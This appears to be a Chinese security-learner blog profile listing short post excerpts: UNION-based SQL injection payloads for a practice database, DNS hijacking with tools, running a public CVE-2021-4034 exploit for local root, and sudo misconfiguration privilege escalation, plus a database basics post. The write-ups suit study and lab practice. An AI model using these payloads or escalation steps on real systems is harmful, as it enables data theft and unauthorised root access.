- 博客(5)
- 收藏
- 关注
RSS订阅原创 SQL注入
利用group_concat()函数输出所有的表 id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_discuz_stormgroup'#输入id=-1' union select 1,group_concat(),group_concat(),4 from stormgroup_member#
2025-03-11 10:07:45
1461
原创 数据库基础介绍
内置Sharding,支持复制集、主备、互为主备、自动分片等特性,第三方支持丰富;是一个长期存储在计算机内的、有组织的、可共享的,统一管理的大量数据的集合,可视为电子化的文件柜。RDBMS一般有固定的表结构,需要通过DDL语句来修改表结构,不容易进行扩展;NoSQL机制更多,例如基于键值对,文档,列,图形,搜索引擎等,方便扩展。在Navicat中,先连接数据库,连接成功后,选中库,点击表,在创建字段,才能插入数据。维护简单,支持广泛,易于拓展。注:插入时,不加单引号就会被识别为字段,就会报错。
2024-09-10 17:12:02
106
原创 利用工具对DNS劫持
攻击者利用缺陷对用户的DNS进行劫持,严重影响用户的上网体验感,同时使得域名由用户的IP指向了攻击者IP,用户域名上的流量也就被攻击者劫取。可以直接从网上找到你想要的,然后可以通过vi /var/www/index.html 对源码进行更改(该处存在一个apache的index.html,可以选择删除,替换成自己想要的index.html)。9)点击搜索符号,就可以扫描出存活的主机,其中192.18.241.2为目标主机的网关,192.168.241.130为存活主机的ip。-T 显示字符的界面;
2024-07-12 17:21:01
1300
原创 CVE-2021-4034漏洞
1.从GitHub上下载已有的CVE-2021-4034-main.zip压缩包,然后复制进centos7,通过在终端输入命令:“unzip CVE-2021-4034-main.zip”对该文件进行解压。5.就可以进行本地提权。输入执行命令:“./cve-2021-4034”,就可以进入root权限,通过whoami来查看是否为root用户。2.cd进入CVE-2021-4034-main,会发现有一个makefile。3.利用源码安装,输入命令:make,来安装cve-01-4034。
2024-06-28 16:17:57
866
原创 初识centos中的配置错误漏洞
sudo漏洞:sudo属于Linux系统的管理指令,通常是以root用户身份运行命令,也允许用户在不需要切换环境的前提下以其他用户的权限运行命令,但普通用户只有在得到许可或者知道root密码才能以root权限执行命令,优点是可以减少root用户的登录和管理时间。3)在root用户下边加入一个普通用户,并加上ALL=/usr/bin/less这一句命令(红色框框位置),就赋予了一个权限。6)此时在root权限下,就可以进行mkdir,或者其他的操作。3)此时在普通用户下,想mkdir一个目录,是不能成功的。
2024-06-28 16:15:43
750
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人